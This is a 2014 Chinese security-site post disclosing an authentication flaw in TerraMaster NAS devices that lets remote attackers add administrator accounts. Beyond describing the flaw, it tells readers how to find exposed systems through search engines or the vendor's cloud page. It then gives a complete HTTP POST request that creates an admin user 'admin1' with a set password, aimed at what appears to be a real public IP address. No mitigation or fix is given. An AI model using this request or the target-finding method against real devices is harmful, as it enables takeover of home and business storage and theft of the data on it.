频道栏目
首页 > 安全 > 网站安全 > 正文
TerraMaster NAS网络存储高危漏洞
2014-10-09 12:03:22         来源:猪哥靓  
收藏   我要投稿

TerraMaster铁威马是一个专业的国际存储品牌,专注于为全球用户提供专业的私有云存储设备,包括高效能、安全可靠、多功能以及环保的NAS网络云储存服务器和DAS直连式存储装置。TerraMaster在银行、保险、学校、中小企业及高端家庭存储市场拥有较高的市场份额和良好的声誉。
 

TerraMaster系统由于默认开启了UPnP和Cloud服务,只要该系统接入互联网即可被访问到。由于某些文件存在权限验证不严格,导致远程攻击者可任意添加管理账户,登入系统后用户或企业的相关敏感资料将可能被盗窃。

铁威马私有云存储NAS网络存储系统添加人管理用户




通过搜索引擎搜索“TerraMaster 系统管理”

或在https://www.terra-master.com/cloud/ 输入存在的账户名即可,如admin





POST以下数据即可
 

POST /include/ajax/ajaxdata.php HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-US
Referer: https://1.1.1.1:8181/mod/3.UserManage/1.user.php
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 222.139.234.187:8181
Content-Length: 230
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=9cf3113aadad895b1bd9affa3ad6fd1d

handleprocess=adduser&username=admin1&pwd=admin1.2.3.&email=&phone=&quota=0&group=admin%2Callusers&fcreate=0&fname= &fhide=0&flock=0&fdisks=md0&folderids=16%2C15%2C14%2C13%2C12%2C3%2C2%2C1&rights=2%2C2%2C2%2C2%2C2%2C2%2C2%2C2





家庭用户
 

1.jpg


 

1.jpg





企业用户
 

1.jpg

 

 

点击复制链接 与好友分享!回本站首页
相关TAG标签 漏洞 网络
上一篇:某通用型企业建站系统2处 sql注入
下一篇:豆瓣某功能平行权限漏洞
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站